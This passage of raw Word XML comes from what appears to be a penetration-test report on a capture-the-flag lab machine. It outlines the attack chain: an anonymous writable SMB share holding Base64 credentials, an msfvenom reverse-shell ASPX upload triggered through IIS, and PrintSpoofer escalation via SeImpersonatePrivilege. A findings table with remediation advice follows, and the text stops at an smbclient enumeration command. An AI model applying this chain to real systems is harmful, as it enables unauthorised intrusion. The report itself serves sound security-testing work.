        <w:t xml:space="preserve"> Gather information about the target system to identify any attack vectors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1AD7ED">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Tasks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F2C46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Port scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEEB34B">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Service Version Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3615F1A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SMB share enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E1647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Web server identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267D7247">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Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49583DB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Linux commands, Nmap and smbclient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E920FF2">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Discovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3118403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Open ports available include: Port 80, port 445, port 3389 and high ports open include port 49663, port 49666, port 49668</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76740CAD">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:leftChars="0" w:hanging="360" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerability Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDA0871">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Aim:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identify any vulnerabilities in the discovered running services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1A7E98">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Tasks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79615C9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SMB service analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654C118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Credential discovery in SMB shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1D471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Web server enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3264C4">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Service configuration review</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C20AB1E">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Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A87E27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Linux commands; smbclient and base64 decode and cyberchef</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE75C35">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Discovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B05E699">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An SMB share named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nt4wrksv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> allowed anonymous access and contained a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>passwords.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> file with Base64-encoded credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5969D3C1">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:leftChars="0" w:hanging="360" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412DCA01">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Aim:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gain access to the target system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C5DD0D">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Tasks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1FA44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Generate reverse shell payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5458FC7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Upload payload via SMB share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3241E8F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Trigger payload through IIS web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5470B76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Establish Reverse shell connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B17965">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Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252909E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Linux commands; Netcat, curl, smbclient and msfvenom with the web browser i.e. Firefox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AA64C1">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Discovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E93A63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nt4wrksv SMB share was writable and mapped to an IIS web directory, enabling Remote Code Execution via ASPX payload upload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB5DDFC">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:leftChars="0" w:hanging="360" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBEB874">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Aim:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Escalate from low-privileged user to system level access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576E5D81">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Tasks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1210523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Enumerate current user privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8E255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Identify SeImpersonatePrivilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC5B98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Deploy PrintSpoofer exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1977946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Obtain SYSTEM shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F53E278">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Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBC515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PrintSpoofer and powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21215EA7">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Discovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FD299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default user had SeImpersonatePrivilege enabled which allows SYSTEM-level escalation via PrintSpoofer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A87D2C9">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Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463DEAF2">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Aim:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Capture target flags and document the findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C6B2FC">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Tasks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DA1A7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Navigate to User Bob’s desktop for first flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB2798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Navigate to Administrator desktop for the root flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E361AD6">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Document attack chain and capture evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAE5E19">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Reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C690289">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Aim:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prepare a comprehensive and detailed report of the penetration testing based on the findings, exploitation path and recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019533B2">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A115BA">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High-Level Findings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
        <w:gridCol w:w="2295"/>
        <w:gridCol w:w="879"/>
        <w:gridCol w:w="1347"/>
        <w:gridCol w:w="1371"/>
        <w:gridCol w:w="2311"/>
      </w:tblGrid>
      <w:tr w14:paraId="18668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75CE088">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="034BDEB0">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Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E6DD11D">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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27752DF4">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Affected Asset(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39F11319">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Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A4FC3D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Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="20016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AD22B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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E8935B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Anonymous Writable SMB Share</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E1DFE1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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D01456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SMB Share</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A34FEF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Remote Code Execution without authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E8B9EB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Disable anonymous access, implement proper authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2840E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CAB0D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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4587392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SeImpersonatePrivilege Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A3C082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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22358A7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IIS AppPool User Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34E67D4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SYSTEM-level privilege escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21F5273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Remove SeImpersonatePrivilege from non-admin accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1716E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2738A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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50428FA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Base64 Encoded credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64EA2E4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0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="675B4D2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passwords.txt file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77C97ED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Credential exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="184760F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Never store passwords in plain text or weak encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="536BC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A45A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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68F588D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SMB message signing Disabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26041B9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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0292B60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SMB Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59A620A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SMB relay attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C8B52D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Enable SMB message signing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="49DA4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47AD1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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11710A3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Weak Account password policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7899D55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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46B45C0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Bob &amp; Bill User Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="037243E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Password guessing attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B625BF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Enforce complex password requirements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21C25F0A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29972E9E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="408EFFE3">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="335B9057">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Detailed Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29906C4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Finding 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FD01C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Title: Anonymous Writable SMB Share Allows Unauthenticated Remote Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D03B574">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Severity: Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44200306">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Description: The SMB service on port 445 was found to have a share named nt4wrksv accessible to anonymous users without any authentication. This share was writable and also mapped to an IIS web directory, creating a direct path for Remote Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D27F3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Impact: an attacker could :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D09B9E9">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="425"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:leftChars="0" w:hanging="360" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Upload arbitrary files to the share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C000F28">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="425"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:leftChars="0" w:hanging="360" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Execute these files through the IIS web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDFE7BC">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="425"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:leftChars="0" w:hanging="360" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gain complete control of the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4065F58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Proof Of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8D279E">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Find any SMB shares available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4660E7">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>smbclient -L //10.49.167.173 -N --option='client min protocol=NT1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0FAB42">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>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-95885</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>109855</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5505450" cy="1476375"/>
                <wp:effectExtent l="6350" t="6350" r="12700" b="22225"/>
                <wp:wrapNone/>
                <wp:docPr id="35" name="Rectangle 35"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
